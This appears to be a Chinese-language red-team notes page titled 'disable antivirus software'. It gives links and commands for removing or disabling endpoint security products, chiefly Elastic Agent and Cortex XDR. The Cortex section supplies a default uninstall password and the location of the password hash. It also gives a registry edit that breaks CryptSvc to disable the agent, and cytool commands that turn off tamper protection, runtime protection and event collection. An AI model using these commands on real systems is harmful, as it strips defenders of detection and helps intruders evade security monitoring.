关闭防病毒软件
Sophos
https://github.com/ayeskatalas/Sophos-Removal-Tool/Symantec
https://knowledge.broadcom.com/external/article/178870/download-the-cleanwipe-removal-tool-to-u.htmlElastic EDR
https://www.elastic.co/guide/en/fleet/current/uninstall-elastic-agent.html
cd "C:\Program Files\Elastic\Agent\"
PS C:\Program Files\Elastic\Agent> .\elastic-agent.exe uninstall
Elastic Agent will be uninstalled from your system at C:\Program Files\Elastic\Agent. Do you want to continue? [Y/n]:Y
Elastic Agent has been uninstalled.Cortex XDR
https://mrd0x.com/cortex-xdr-analysis-and-bypass/
卸载密码:Password1
Password hash is located in C:\ProgramData\Cyvera\LocalSystem\Persistence\agent_settings.db
Look for PasswordHash, PasswordSalt or password, salt strings.
禁用Cortex:将DLL改成随机值,然后重启
reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\CryptSvc\Parameters /t REG_EXPAND_SZ /v ServiceDll /d nothing.dll /f
启动时禁用,重启生效
cytool.exe startup disable
禁用对 Cortex XDR 文件、进程、注册表和服务的保护
cytool.exe protect disable
禁用 Cortex XDR(即使启用了篡改保护)
cytool.exe runtime disable
禁用事件收集
cytool.exe event_collection disable禁用Windows Defender
防火墙
最后更新于
这有帮助吗?